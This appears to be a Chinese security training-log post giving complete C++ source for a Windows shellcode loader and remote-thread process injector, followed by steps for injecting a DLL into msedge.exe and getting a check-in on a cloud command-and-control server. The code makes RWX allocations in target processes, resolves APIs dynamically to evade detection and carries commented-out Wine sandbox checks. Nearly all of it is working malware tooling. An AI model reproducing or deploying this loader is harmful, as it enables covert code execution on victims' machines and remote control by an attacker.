【实训日志】7.17 日志

目录

#一. 代码部分:

MyFunc.h

Main.Cpp

#二. 具体操作


#一. 代码部分:

MyFunc.h

#pragma once

#include<Windows.h>

#include <tlhelp32.h>

#include <fstream>

#include<iostream>

using namespace std;

// Function-pointer aliases for the kernel32 exports that Main.Cpp looks up at
// runtime with GetProcAddress instead of calling them through the import
// table. Each signature mirrors the Windows SDK declaration of the same name.

// VirtualAllocEx: allocate (reserve/commit) memory inside another process.
using fn_VirtualAllocEx = LPVOID(WINAPI*)(
    HANDLE hProcess,
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD  flAllocationType,
    DWORD  flProtect
    );

// OpenProcess: obtain a handle to a process by PID with the requested rights.
using fn_OpenProcess = HANDLE(WINAPI*)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
    );

// VirtualAlloc: allocate (reserve/commit) memory in the calling process.
using fn_VirtualAlloc = LPVOID(WINAPI*)(
    _In_opt_ LPVOID lpAddress,
    _In_     SIZE_T dwSize,
    _In_     DWORD flAllocationType,
    _In_     DWORD flProtect
    );

// CreateThread: start a thread in the calling process at lpStartAddress.
using fn_CreateThread = HANDLE(WINAPI*)(
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ __drv_aliasesMem LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
);

Main.Cpp

#include "myFunc.h"

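// Convert a multibyte (char*) string to a freshly malloc'd wide string.
//
// `a` points at the char* to convert (the double indirection is kept for the
// existing callers). The conversion uses the process locale, which — as in
// the original — is set from the environment with setlocale(LC_ALL, "") on
// every call.
//
// Returns a malloc'd, NUL-terminated wchar_t buffer that the caller is
// responsible for free()ing (Inject() currently never does), or nullptr
// after perror() when the input is null, is not valid in the current
// locale, or the allocation fails.
wchar_t* AtoW(char** a) {
    if (a == nullptr || *a == nullptr) {
        return nullptr;
    }
    setlocale(LC_ALL, "");
    const char* char_str = *a;

    // Measuring pass. mbstowcs reports an invalid sequence as (size_t)-1, so
    // the check must happen before adding 1 for the terminator: the original
    // added 1 first, which turned -1 into 0 and made the check unreachable.
    const size_t converted = mbstowcs(nullptr, char_str, 0);
    if (converted == static_cast<size_t>(-1)) {
        perror("mbstowcs");
        return nullptr;
    }
    const size_t wchar_size = converted + 1;

    // malloc rather than new[] so the result pairs with free(), as before.
    wchar_t* wchar_str = static_cast<wchar_t*>(malloc(wchar_size * sizeof(wchar_t)));
    if (wchar_str == nullptr) {
        perror("malloc");
        return nullptr;
    }

    // Conversion pass. wchar_size includes the terminator slot; the explicit
    // NUL afterwards is a belt-and-braces guard against a locale change
    // between the two passes.
    if (mbstowcs(wchar_str, char_str, wchar_size) == static_cast<size_t>(-1)) {
        perror("mbstowcs");
        free(wchar_str);
        return nullptr;
    }
    wchar_str[wchar_size - 1] = L'\0';
    return wchar_str;
}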

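// Read the whole of `file` (the payload path from the command line) into a
// new[]-allocated buffer.
//
// `length` receives the number of bytes read (0 on failure). Returns a
// buffer of exactly *length bytes that the caller must delete[] — the
// buffer is not NUL-terminated — or nullptr when the file cannot be opened,
// sized or fully read.
//
// Note: this overloads the Win32 ReadFile declared by <Windows.h>; the
// parameter lists differ, so overload resolution keeps them apart, but a
// distinct name would be less confusing.
char* ReadFile(SIZE_T* length, char* file) {
    *length = 0;
    if (file == nullptr) {
        return nullptr;
    }

    // Read-only binary open. The original passed ios::out, which on an
    // ifstream selects read+write mode and therefore fails on read-only files.
    ifstream infile(file, ios::in | ios::binary);
    if (!infile.is_open()) {
        return nullptr;
    }

    // Size via seek/tell, done only after is_open(): tellg() on a closed
    // stream returns -1, which the original stored into an unsigned SIZE_T
    // and then handed to new[].
    infile.seekg(0, ios::end);
    const std::streamoff size = infile.tellg();
    if (size < 0) {
        return nullptr;
    }
    infile.seekg(0, ios::beg);

    char* data = new char[static_cast<size_t>(size)];
    cout << "reading from the file" << endl;
    infile.read(data, size);
    if (infile.gcount() != size) {
        // Short read: do not hand back a partially filled buffer.
        delete[] data;
        return nullptr;
    }
    *length = static_cast<SIZE_T>(size);
    return data;
}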

// Inject the file named in argv[2] into every running process whose image
// name contains argv[3] (argument layout per main's usage text:
// "-i <path> <process name>").
//
// Per matching process the sequence is OpenProcess(PROCESS_ALL_ACCESS) ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
// CreateRemoteThread -> WaitForSingleObject. This is the classic remote-thread
// injection chain and the exact pattern endpoint detections look for: an RWX
// allocation in a foreign process followed by a new thread whose start
// address lies inside that allocation.
//
// Known issues, left unchanged here:
//   - `data` (new[] from ReadFile) is never delete[]d; `exename` (malloc from
//     AtoW) is allocated once per enumerated process and never freed.
//   - If AtoW fails it returns 0, and wstring::find(nullptr) is undefined.
//   - The match is wstring::find(), i.e. a substring test, so a short argv[3]
//     matches more processes than intended.
//   - CloseHandle(remote_buffer) passes a memory address, not a HANDLE; the
//     call fails and the remote allocation is never released.
//   - ReadFile's result is used without checking it.
void Inject(char* argv[]) {
    SIZE_T length = 0;
    char* data;
    data = ReadFile(&length, argv[2]);  // payload bytes; length set by ReadFile

    // Earlier in-process variant, kept commented out by the author.
    /*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(mem, data, length);
    EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/

    HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);   // process-list snapshot
    if (snapshot_handle != INVALID_HANDLE_VALUE) {
        // Walk the process list.
        PROCESSENTRY32 process_entry;
        process_entry.dwSize = sizeof(PROCESSENTRY32);
        if (Process32First(snapshot_handle, &process_entry)) {
            do {
                // Image name as a wide string. szExeFile is TCHAR, so this
                // presumably relies on UNICODE being defined — confirm in the
                // project settings.
                std::wstring extFileName(process_entry.szExeFile);
                wchar_t* exename = AtoW(&argv[3]);  // malloc'd; leaked on every iteration
                // Substring match against the requested name (e.g. "msedge.exe").
                // std::string::npos and std::wstring::npos are the same value.
                if (extFileName.find(exename) != std::string::npos) {
                    // OpenProcess is resolved at runtime through
                    // LoadLibraryA/GetProcAddress rather than the import table.
                    fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
                    HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
                    if (process_handle != NULL) {
                        // RWX allocation in the target process, also resolved at runtime.
                        fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
                        LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                        if (remote_buffer != NULL) {
                            SIZE_T bytes_written;
                            // Copy the payload into the target; bytes_written is
                            // never compared against length.
                            if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
                                std::cout << "Remote buffer address: " << remote_buffer << std::endl;
                                // Start a thread in the target whose entry point is the
                                // buffer itself (called directly, not via GetProcAddress).
                                HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
                                if (remote_thread != NULL) {
                                    // Block until the remote thread exits.
                                    WaitForSingleObject(remote_thread, INFINITE);
                                    CloseHandle(remote_thread);
                                }
                            }
                            // NOTE(review): remote_buffer is an address, not a handle;
                            // this call fails and frees nothing (see header comment).
                            CloseHandle(remote_buffer);
                        }
                        // Release the process handle.
                        CloseHandle(process_handle);
                    }
                }
            } while (Process32Next(snapshot_handle, &process_entry)); // next process
        }
        // Release the snapshot handle.
        CloseHandle(snapshot_handle);
    }
}

// Run the payload file in the current process (the original comment calls
// this the "normal check-in" path): copy it into an RWX allocation and start
// a thread whose entry point is that buffer.
//
// VirtualAlloc and CreateThread are resolved through GetProcAddress rather
// than called via the import table. The raw flag values are MEM_COMMIT
// (0x00001000) and PAGE_EXECUTE_READWRITE (0x40); the -1 passed to
// WaitForSingleObject converts to 0xFFFFFFFF, i.e. INFINITE.
//
// Known issues, left unchanged here: `data`, `shell_addr` and `HThread` are
// never checked for NULL (memcpy into a NULL shell_addr faults), HThread is
// never closed, and data (new[] from ReadFile) is never delete[]d.
VOID Normal(char* file) {
    SIZE_T length = 0;
    char* data = NULL;
    data = ReadFile(&length, file);  // payload bytes; length set by ReadFile

    fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
    fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");

    // 0x00001000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE.
    LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
    memcpy(shell_addr, data, length);
    // The new thread starts executing at the buffer's first byte.
    HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
    WaitForSingleObject(HThread, -1);  // -1 -> INFINITE
}

//LPVOID == Long Point VOID

//int Check_MulDiv_1() {

//    // Call MulDiv with specific arguments

//    int result = MulDiv(1, 0x80000000, 0x80000000);

//

//    // Check if the result matches the expected value

//    if (result != 2) {

//        std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;

//    }

//    else {

//        std::cout << "MulDiv evasion method not detected." << std::endl;

//    }

//

//    return 0;

//}

//int Check_MulDiv_2() {

//    // Check for the existence of Wine's exclusive APIs

//    HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");

//    FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");

//    HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");

//    FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");

//

//    if (wineGetUnixFileName || wineGetHostVersion) {

//        std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;

//    }

//    else {

//        std::cout << "Wine's exclusive APIs not detected." << std::endl;

//    }

//

//    return 0;

//}

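// Original notes: the process that checks in to the remote-control server
// becomes the injection target; privilege levels: User, Administrator, System.

// Command-line entry point. Modes (the "-h" text lists them):
//   -i <path> <process>   call Inject() with argv
//   -d <path>             call Normal(<path>)
//   -h                    print the mode list
//
// Change from the original: argv[1] and argv[2] are only read once argc
// confirms they exist; the original indexed argv[1] unconditionally, which
// is undefined behaviour when the program is started with no arguments.
// Returns 0 as before, or 1 when a required argument is missing.
int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("-i Inject\n-h help\n-d normal\n");
        return 1;
    }
    const char* mode = argv[1];
    if (strcmp(mode, "-i") == 0) {
        if (argc == 4) {
            printf("Injecting!!!\n");
            Inject(argv);
        }
        else {
            wprintf(L"注入方式:-i 路径 进程名\n");  // usage: -i <path> <process name>
        }
    }
    if (strcmp(mode, "-d") == 0) {
        if (argc < 3) {
            // -d needs the payload path; the original passed argv[2] unchecked.
            printf("-i Inject\n-h help\n-d normal\n");
            return 1;
        }
        Normal(argv[2]);
    }
    if (strcmp(mode, "-h") == 0) {
        printf("-i Inject\n-h help\n-d normal\n");
    }
    /*printf("%d\n", argc);
    printf("%s", argv[1]);*/
    return 0;
}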

#二. 具体操作

1.属性-》配置属性-》调试-》命令参数-》-i box.dll msedge.exe

2.server启动

3.将dll文件放到vs2022项目文件下运行文件 

4.在云服务器上配置端口,上线成功! 
